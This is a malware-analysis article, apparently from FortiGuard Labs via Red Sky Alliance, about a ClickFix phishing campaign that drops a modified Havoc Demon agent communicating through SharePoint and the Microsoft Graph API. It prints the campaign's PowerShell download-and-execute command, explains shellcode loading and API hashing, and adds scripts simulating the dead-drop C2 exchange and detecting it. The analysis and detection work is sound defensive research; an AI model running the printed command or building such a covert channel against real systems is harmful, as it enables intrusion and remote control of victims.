Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Sliver, and Winos4.0, Havoc has been used in threat campaigns to gain complete control over the target. Additionally, it is open source and available on GitHub, which makes it easy for threat actors to modify it to evade detection.
FortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain.
Figure 1: Attack flow
Initial Access - The attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2.
It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately.
Figure 2: The phishing e-mail
The attachment, “Documents.html,” is a ClickFix attack: the HTML embeds a fake error message and instructions that deceive the user into copying a malicious PowerShell command and pasting it into a terminal or PowerShell window, which ultimately executes the malicious code.
Figure 3: Document.html using ClickFix social engineering tactic
Decoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote PowerShell script:
PowerShell -w h -c "iwr 'hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex"
Here -w h starts PowerShell with a hidden window, iwr (Invoke-WebRequest) fetches the script through a SharePoint share link, and the downloaded text is piped to iex (Invoke-Expression), so the script runs in memory without being written to disk.
payload_20250112_074319.ps1
The script is hosted on SharePoint and controlled by the threat actor. When it runs, it checks whether the execution environment is a sandbox by verifying the number of domain computers. It then deletes all registry entries under HKCU:\Software\Microsoft whose names start with "zr_" and adds a new property under that key as an infection marker, as shown in Figure 4.
Figure 4: PowerShell script for sandbox evasion and infection tagging
Next, the script checks whether pythonw.exe exists. If it is not found, the script downloads the Python interpreter; otherwise it runs the Python script directly. Finally, the remote Python script is retrieved and executed in a hidden window to obscure the malicious activity, as shown in Figure 5.
Figure 5: PowerShell script for downloading and executing the remote Python script
Python Shellcode Loader - payload_20250107_015913.py - Like the PowerShell script, the Python script is hosted on the same SharePoint site. It contains debug messages written in Russian and serves as a shellcode loader.
Researchers executed the script directly with the Python interpreter in the terminal. The log displays “Выделение памяти” (memory allocation), “Запись в память” (writing to memory), “Выполнение shellcode” (executing shellcode), and “Завершение выполнения скрипта” (script execution complete) in sequence, indicating successful shellcode execution, as seen in Figure 6.
Figure 6: Python script for shellcode execution
KaynLdr - KaynLdr is a shellcode loader published on GitHub that is designed to load an embedded DLL reflectively. It complicates analysis by resolving APIs through hashes computed with a modified DJB2 algorithm instead of an import table, and it uses the resolved ntdll APIs for memory allocation and mapping. The instruction “call rax” transfers execution to the embedded DLL's entry point, as shown in Figure 7.
Figure 7: Executing the DLL with the KaynLdr shellcode loader
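The following added example (my code, not KaynLdr's) shows both sides of API hashing: how a loader with no import table resolves a function by hashing every export name until one matches, and how an analyst recovers the names behind hardcoded hashes by trying parameter variants. It uses plain DJB2 with the seed and shift exposed as parameters; the page does not say how KaynLdr's variant is modified, and the export list, the "sample" hashes and the non-default seed 0x7EAD are all constructed for the demonstration.

```python
from __future__ import annotations


def djb2(name: bytes, seed: int = 5381, shift: int = 5) -> int:
    """Classic DJB2 over an export name: h = h * 33 + c, truncated to 32 bits.

    `seed` and `shift` are the parameters a "modified DJB2" usually changes;
    KaynLdr's exact tweak is not given on the page, so treat them as knobs to
    match against the disassembled hash routine (assumption, not KaynLdr's code).
    """
    h = seed
    for c in name:
        h = ((h << shift) + h + c) & 0xFFFFFFFF
    return h


# Constructed subset of export names. A real loader (and a real analyst) walks the
# export directory of the module in memory to get the full list.
EXPORTS = [
    b"NtAllocateVirtualMemory", b"NtProtectVirtualMemory", b"NtWriteVirtualMemory",
    b"NtCreateThreadEx", b"LdrLoadDll", b"LdrGetProcedureAddress",
    b"RtlAddFunctionTable", b"NtFlushInstructionCache",
]


def resolve(wanted: int, exports: list[bytes], seed: int = 5381, shift: int = 5) -> bytes | None:
    """Loader side: hash every export name until one equals the hardcoded value."""
    for name in exports:
        if djb2(name, seed, shift) == wanted:
            return name
    return None


def recover_names(hashes: list[int], exports: list[bytes],
                  candidate_seeds: tuple[int, ...] = (5381, 0, 0x7EAD),
                  candidate_shifts: tuple[int, ...] = (5, 6, 7)):
    """Analyst side: try parameter combinations until every hardcoded hash resolves.

    Returns ((seed, shift), {hash: name}) for the first combination that explains
    all of the hashes, or None if no candidate does.
    """
    for seed in candidate_seeds:
        for shift in candidate_shifts:
            table = {djb2(n, seed, shift): n for n in exports}
            if all(h in table for h in hashes):
                return (seed, shift), {h: table[h] for h in hashes}
    return None


# Constructed stand-in for "hashes pulled out of the shellcode": computed here with
# a non-default seed to play the role of a modified variant whose parameters the
# analyst has to recover.
SAMPLE_HASHES = [
    djb2(n, seed=0x7EAD)
    for n in (b"NtAllocateVirtualMemory", b"NtProtectVirtualMemory", b"NtCreateThreadEx")
]

if __name__ == "__main__":
    print(recover_names(SAMPLE_HASHES, EXPORTS))
```

In practice you would dump the hash constants from the loader's resolution stubs, build the export list from the ntdll and kernel32 export directories, and widen the candidate sets until every constant resolves; once the parameters are known, every other hash in the sample can be renamed in the disassembler.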
Havoc Demon DLL - Havoc is an open-source post-exploitation command-and-control framework used in red-team exercises and in attack campaigns to gain complete control over compromised targets. In this campaign, we observed the threat actor using Havoc with the Microsoft Graph API to conceal C2 communication within a well-known service. The modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the required APIs and initialize its configuration objects.
Figure 8: DemonMain in the modified Havoc Demon DLL; the retrieved APIs are stored in the structure beginning at address 0xb6
The second function, “SharePointC2Init,” initializes the files on the actor's SharePoint site using the Microsoft Graph API. It first combines the hardcoded shared secret with the other parameters required for a POST request and sends that request to the /token endpoint of the Microsoft identity platform to obtain an access token for the Microsoft Graph API. Because the token is obtained with a secret embedded in the implant rather than with victim credentials, the agent needs nothing from the compromised user to reach the actor's tenant.
Figure 9: Access token request with a hardcoded shared secret
Next, it uses the obtained token to create two files in the root folder of the site's default document library with PUT requests, as shown in Figure 10.
Figure 10: Creating a file in the root folder
The VictimID, derived from the Havoc AgentID, is used as the filename, with the suffix “pD9-tKout” or “pD9-tKin” appended to indicate each file's purpose.
Table 1: The two files used for SharePoint C2 to control the target.
{VictimID}pD9-tKout: written by the agent; carries the agent's requests (CheckIn, Get Job) to the C2.
{VictimID}pD9-tKin: written by the C2; carries the responses and tasks for the agent, and is erased by the agent once read.
The initial packet sent to the C2 is a CheckIn request containing data gathered by the DemonMetaData function. In this step, the victim's information, such as the host name, user name, domain name, IP address, process details, OS information, whether the user has an elevated account, and the configuration in the Demon DLL, is sent to the C2 server. All content is encrypted using AES-256 in CTR mode with a randomly generated 256-bit key and a 128-bit IV. The encrypted payload is then prepended with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function.
Figure 11: The contents of CheckIn request and Metadata Structure in Havoc Github
The TransportSend function has been modified to communicate with the C2 through the two files {VictimID}pD9-tKout and {VictimID}pD9-tKin. It writes the request to the “{VictimID}pD9-tKout” file and then retrieves the response from the C2 with a Microsoft Graph API GET request for the contents of the “{VictimID}pD9-tKin” file. If the response is retrieved successfully, the content of the “{VictimID}pD9-tKin” file is erased immediately.
Figure 12: The modified TransportSend function and the function “FetchInFile”
Next, the content of the response is compared with the AgentID. If they match, the session's connected flag is set, and the agent enters the dispatcher routine to await new tasks from the attacker. In the dispatcher routine, the agent sends a “Get Job” request and parses the response into a Command ID, a Request ID, and the task. Although we observed only DEMON_COMMAND_NO_JOB (Command ID 0xA) during our analysis, as shown in Figure 13, the code decrypts and executes the task whenever the response carries a Command ID other than 0xA.
Figure 13: Accessing the contents of the ‘{VictimID}pD9-tKin’ file
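To make the dead-drop exchange concrete, here is an added, offline simulation of the SharePointC2Init and TransportSend behaviour described above, with the teamserver's turn included so both sides of the exchange are visible. It is my code, not Fortinet's analysis artefact and not Havoc's source: the token and drive-item endpoint shapes are Microsoft's documented Graph endpoints and are assumed to be what the implant targets; the tenant, site id, AgentID, the rendering of the VictimID as hex, the "erase by empty PUT", and the job byte layout (Command ID, Request ID, task) are all constructed for the example.

```python
from __future__ import annotations

import struct
from urllib.parse import urlencode

GRAPH = "https://graph.microsoft.com/v1.0"
DEMON_COMMAND_NO_JOB = 0xA   # Command ID observed on the page
CONSTRUCTED_TASK_ID = 0x2    # placeholder for "any Command ID other than 0xA"

# Placeholders: the real tenant, app registration and site are not on the page.
TENANT = "00000000-0000-0000-0000-000000000000"
SITE_ID = "contoso.sharepoint.com,11111111-1111-1111-1111-111111111111,22222222-2222-2222-2222-222222222222"


def token_request(client_id: str, client_secret: str) -> tuple[str, str]:
    """URL and form body for a client-credentials token request.

    The endpoint shape is Microsoft's documented v2.0 token endpoint; the page
    states only that a hardcoded shared secret is POSTed to /token.
    """
    url = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token"
    body = urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
    })
    return url, body


def dropbox_names(agent_id: int) -> tuple[str, str]:
    """The two dead-drop files: VictimID plus the fixed suffixes from the page.
    Rendering the AgentID as 8 hex digits is an assumption about the VictimID format."""
    victim = f"{agent_id:08x}"
    return f"{victim}pD9-tKout", f"{victim}pD9-tKin"


def content_url(name: str) -> str:
    """Graph drive-item content endpoint for a file in the root of the default library."""
    return f"{GRAPH}/sites/{SITE_ID}/drive/root:/{name}:/content"


class FakeDrive:
    """In-memory stand-in for the document library so the exchange runs offline."""

    def __init__(self) -> None:
        self.files: dict[str, bytes] = {}
        self.log: list[tuple[str, str]] = []

    def request(self, method: str, url: str, body: bytes = b"") -> tuple[int, bytes]:
        self.log.append((method, url))
        name = url.split("/drive/root:/", 1)[1].rsplit(":/content", 1)[0]
        if method == "PUT":
            self.files[name] = body
            return 201, b""
        if method == "GET":
            return (200, self.files[name]) if name in self.files else (404, b"")
        raise ValueError(method)


def transport_send(drive: FakeDrive, agent_id: int, request: bytes, operator=None) -> bytes | None:
    """Agent side of TransportSend as the page describes it: PUT the request into
    ...tKout, GET ...tKin, and erase ...tKin once a response was read (modelled as
    an empty-body PUT). `operator` stands in for the teamserver turn in between."""
    out_name, in_name = dropbox_names(agent_id)
    drive.request("PUT", content_url(out_name), request)
    if operator is not None:
        _, pending = drive.request("GET", content_url(out_name))
        drive.request("PUT", content_url(in_name), operator(pending))
    status, response = drive.request("GET", content_url(in_name))
    if status == 200 and response:
        drive.request("PUT", content_url(in_name), b"")
        return response
    return None


def parse_job(response: bytes) -> tuple[int, int, bytes]:
    """Constructed job layout: CommandID(4) | RequestID(4) | task. Not Havoc's real wire format."""
    command_id, request_id = struct.unpack_from("<II", response, 0)
    return command_id, request_id, response[8:]


def simulate(agent_id: int = 0x41424344) -> dict:
    """Three round trips: CheckIn, an idle Get Job, and a Get Job that carries a task."""
    drive = FakeDrive()
    _, in_name = dropbox_names(agent_id)

    # 1. CheckIn: the operator answers with the AgentID, which marks the session connected.
    reply = transport_send(drive, agent_id, b"CHECKIN|host|user|domain",   # metadata stand-in
                           operator=lambda req: struct.pack("<I", agent_id))
    connected = reply is not None and struct.unpack("<I", reply[:4])[0] == agent_id

    # 2. Idle poll: nothing queued, so the operator leaves DEMON_COMMAND_NO_JOB.
    reply = transport_send(drive, agent_id, b"GETJOB",
                           operator=lambda req: struct.pack("<II", DEMON_COMMAND_NO_JOB, 0))
    idle = parse_job(reply)[0] == DEMON_COMMAND_NO_JOB

    # 3. A queued task: any Command ID other than 0xA is dispatched for execution.
    reply = transport_send(drive, agent_id, b"GETJOB",
                           operator=lambda req: struct.pack("<II", CONSTRUCTED_TASK_ID, 7) + b"whoami")
    command_id, request_id, task = parse_job(reply)

    return {"connected": connected, "idle": idle,
            "command_id": command_id, "request_id": request_id, "task": task,
            "in_file_erased": drive.files[in_name] == b"",
            "requests": len(drive.log)}
```

The point of the simulation is the traffic shape it produces: every agent turn is one PUT to a ...tKout item followed by one GET of a ...tKin item, and a successful read is followed by a write that empties the file, all against the same site from the same process. That shape survives the encryption of the payload and is what a network detection has to key on.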
The supported commands are the same as those in the Havoc GitHub repository, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos attacks.
Figure 14: The primary function for executing the Demon command
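Hiding the channel inside Microsoft Graph traffic defeats domain- and certificate-based blocking, but the activity described above still leaves hunting opportunities in proxy or EDR network logs. The following added example (my code, not part of Fortinet's report) runs four checks over constructed log lines: a script host such as powershell.exe or pythonw.exe fetching a SharePoint share link, a token request to login.microsoftonline.com from a process that should not be doing OAuth on its own, the literal pD9-tKout/pD9-tKin suffixes from this campaign, and, more generally, a process that repeatedly PUTs one root-folder file and then GETs a different one. The log format, the process allowlist, and the assumption that the implant's traffic originates from pythonw.exe (the Python loader runs the shellcode in its own process) are mine; adapt the parser and the lists to your telemetry.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed proxy log lines: "<timestamp> <host> <process> <method> <url> <status>".
# The schema is an assumption; only the SharePoint host and the file suffixes come from the page.
SAMPLE_LOG = """\
2025-01-12T07:43:19Z WS01 powershell.exe GET https://hao771.sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo 200
2025-01-12T07:43:25Z WS01 pythonw.exe GET https://hao771.sharepoint.com/_layouts/15/download.aspx?share=EU8abc 200
2025-01-12T07:44:01Z WS01 pythonw.exe POST https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/v2.0/token 200
2025-01-12T07:44:02Z WS01 pythonw.exe PUT https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKout:/content 201
2025-01-12T07:44:02Z WS01 pythonw.exe PUT https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKin:/content 201
2025-01-12T07:44:05Z WS01 pythonw.exe PUT https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKout:/content 200
2025-01-12T07:44:06Z WS01 pythonw.exe GET https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKin:/content 200
2025-01-12T07:44:10Z WS01 pythonw.exe PUT https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKout:/content 200
2025-01-12T07:44:11Z WS01 pythonw.exe GET https://graph.microsoft.com/v1.0/sites/abc/drive/root:/41424344pD9-tKin:/content 404
2025-01-12T07:50:00Z WS02 msedge.exe GET https://graph.microsoft.com/v1.0/me/drive/root/children 200
2025-01-12T07:51:00Z WS02 OUTLOOK.EXE POST https://login.microsoftonline.com/common/oauth2/v2.0/token 200
"""

LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
SHAREPOINT_DL = re.compile(r"^https://[^/]+\.sharepoint\.com/_layouts/15/download\.aspx\?share=", re.I)
TOKEN_EP = re.compile(r"^https://login\.microsoftonline\.com/[^/]+/oauth2/(v2\.0/)?token$", re.I)
DRIVE_CONTENT = re.compile(r"^https://graph\.microsoft\.com/v1\.0/.*/drive/root:/(?P<name>[^/]+):/content$", re.I)
DEADDROP_NAME = re.compile(r"pD9-tK(out|in)$")        # the two suffixes from this campaign

# Constructed lists: script hosts that should not be pulling stages from SharePoint,
# and processes for which a direct token request is normal in this environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "python.exe", "pythonw.exe", "rundll32.exe", "regsvr32.exe"}
TOKEN_ALLOWED = {"msedge.exe", "chrome.exe", "outlook.exe", "teams.exe", "onedrive.exe",
                 "excel.exe", "winword.exe"}


def parse(log: str) -> list[dict[str, str]]:
    """Parse the constructed schema; lines that do not fit are skipped, not guessed at."""
    rows = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def detect(log: str, min_cycles: int = 2) -> list[tuple[str, str, str, str]]:
    """Return (rule, host, process, detail) findings for the four checks described above."""
    findings: list[tuple[str, str, str, str]] = []
    cycles: dict[tuple[str, str], int] = defaultdict(int)
    last_put: dict[tuple[str, str], str] = {}
    for r in parse(log):
        key = (r["host"], r["proc"])
        proc = r["proc"].lower()
        if proc in SCRIPT_HOSTS and SHAREPOINT_DL.match(r["url"]):
            findings.append(("script-host-sharepoint-download", *key, r["url"]))
        if TOKEN_EP.match(r["url"]) and proc not in TOKEN_ALLOWED:
            findings.append(("token-request-unexpected-process", *key, r["url"]))
        m = DRIVE_CONTENT.match(r["url"])
        if not m:
            continue
        name = m.group("name")
        if DEADDROP_NAME.search(name):
            findings.append(("havoc-sharepoint-deaddrop-name", *key, name))
        # Behavioural check, independent of the file names: PUT to one root-folder file
        # followed by GET of a different root-folder file from the same process, repeated.
        if r["method"] == "PUT":
            last_put[key] = name
        elif r["method"] == "GET" and key in last_put and last_put[key] != name:
            cycles[key] += 1
            last_put.pop(key)
    for key, n in cycles.items():
        if n >= min_cycles:
            findings.append(("deaddrop-polling-pattern", *key, f"{n} put/get cycles"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

The suffix rule is the cheapest to deploy and the easiest for the actor to change; the polling-pattern rule and the "token request from an odd process" rule are the ones worth keeping once the campaign-specific strings rotate, and both need a per-environment allowlist before they are quiet enough to page on.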
Conclusion - In addition to staying alert for phishing emails, users must treat with extra caution any guided message that encourages them to open a terminal or PowerShell window, so that they do not inadvertently download and execute malicious commands.
In this article, Fortinet uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the campaign, now further integrated with a modified Havoc Demon that hides malicious communication within Microsoft Graph API traffic, making identification and detection even more challenging.
IOCs
C2
hao771[.]sharepoint.com
Files (SHA-256)
51796effe230d9eca8ec33eb17de9c27e9e96ab52e788e3a9965528be2902330
989f58c86343704f143c0d9e16893fad98843b932740b113e8b2f8376859d2dd
a5210aaa9eb51e866d9c2ef17f55c0526732eacb1a412b910394b6b51246b7da
cc151456cf7df7ff43113e5f82c4ce89434ab40e68cd6fb362e4ae4f70ce65b3
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122